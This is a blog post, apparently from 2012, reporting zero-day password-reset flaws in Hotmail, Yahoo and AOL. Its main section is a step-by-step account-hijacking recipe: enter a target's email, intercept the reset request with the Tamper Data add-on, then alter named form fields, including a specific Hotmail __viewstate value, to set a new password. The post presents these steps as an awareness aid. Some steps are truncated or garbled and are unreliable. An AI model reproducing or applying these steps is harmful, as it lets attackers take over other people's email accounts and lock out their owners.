What are you thinking?

View Results

Loading ... Loading ...
1 Star2 Stars3 Stars4 Stars5 Stars (Rate This)
Loading...Loading...

Quite recently, a zero day vulnerability was found in Hotmail which would put the account security of a Hotmail user at jeopardy. The vulnerability allowed a hacker to reset the account’s password to his own choice and through this, lock out the actual owner of the account. That’s apparently the tip of an iceberg. Now, similar vulnerabilities have been found in AOL and Yahoo too.


The vulnerability actually utilizes the Tamper Data add-on. Through this add-on, the hacker is able to tackle the outgoing HTTP request from a browser the very moment the request is being sent. Then he is able to modify whatever data is being sent. In this way, if you try to reset your password, the hacker can gain access to this request, input his own password for resetting and then have the account’s password reset. As a result, you are locked out of your account and the hacker gains controls of it.

Given below is a detailed, step-by-step description of how the process is performed so that you may be well aware if it ever happens to you.

Vulnerability in Hotmail:

  • Go to https://maccount.live.com/ac/resetpwdmain.aspx
  • Enter the target email and then the 6 characters as verification
  • Initiate Tamper Data
  • Delete the element “SendEmail_ContinueCmd”
  • Replace Element  “__V_previousForm” with “ResetOptionForm”
  • Change “__viewstate” to “%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI”
  • Hit Ok and Type any new password that you like
  • Start Tamper Data again and “__V_SecretAnswerProof”

Vulnerability in Yahoo:

  • Browse to the link https://edit.yahoo.com/forgot .
  • Enter target email and 6 verification characters
  • Start Tamper Data
  • Change element  “Stage” to “fe200″
  • Hit Ok and then enter the new password
  • Start Tamper Data All in Element Z

Vulnerability in AOL:

  • Browse to the Reset page.
  • Enter target email and verification characters
  • Start Tamper Data
  • Change the element  “action” to “pwdReset”
  • Change the element  “isSiteStateEncoded” to “false”
  • Hit Ok and type new password
  • Start Tamper Data All in Element mdNO

Buy Cheapest Related Product From Amazon.com


Six-year-old Boy May Achieve ‘The World’s Youngest Computer Programmer’ Title

Aatma Studio Imagines New Self-Destruct Feature In iPhone 5
You can also press the left/right arrow key on your keyboard to go to previous/next post
  On April 29, 2012(2 years, 7 months ago.)

Recent Products

Buy Now | Compare  
Buy Now | Compare  
Buy Now | Compare  
Buy Now | Compare  
Compare  

What Do You Think?

Loading Disqus Comments ...
Loading Facebook Comments ...

Recent Search

Recent Tutorials

Many users are already complaining and searching for the tips of how to capture the screenshot on LG G3. The tutorial will help to do that.
The tutorial will help how you can minimize the mobile data on your android device (Here we used LG G3 S for the tutorial)
The tutorial will help you to turn on battery Saver for LG G3 or G3 S both manually and automatically.
This tutorial is about how you can set up various auto reply messages on LG G3 S tp know the caller why you could not answer the call.
This tutorial is about disabling automatic shortcut creation of new installed app on android devices.
This tutorial is about showing you how to turn off location in Facebook of your Android devices.
My tutorial is for those who wants to delete those history partially or fully or to disable those if they want.
This tutorial will show you how to stop those videos in your Android mobile not to play automatically.
This tutorial will help you to Disable Auto-Update Of Android Apps in your Android Device. The steps are quite easy to execute.
This tutorial will help you to clear search history from your Google Play Store in your Android Device. The steps are quite easy to execute.
Close You Have To Login
User:
Pass:
Login With »Login With TwitterLogin With Facebook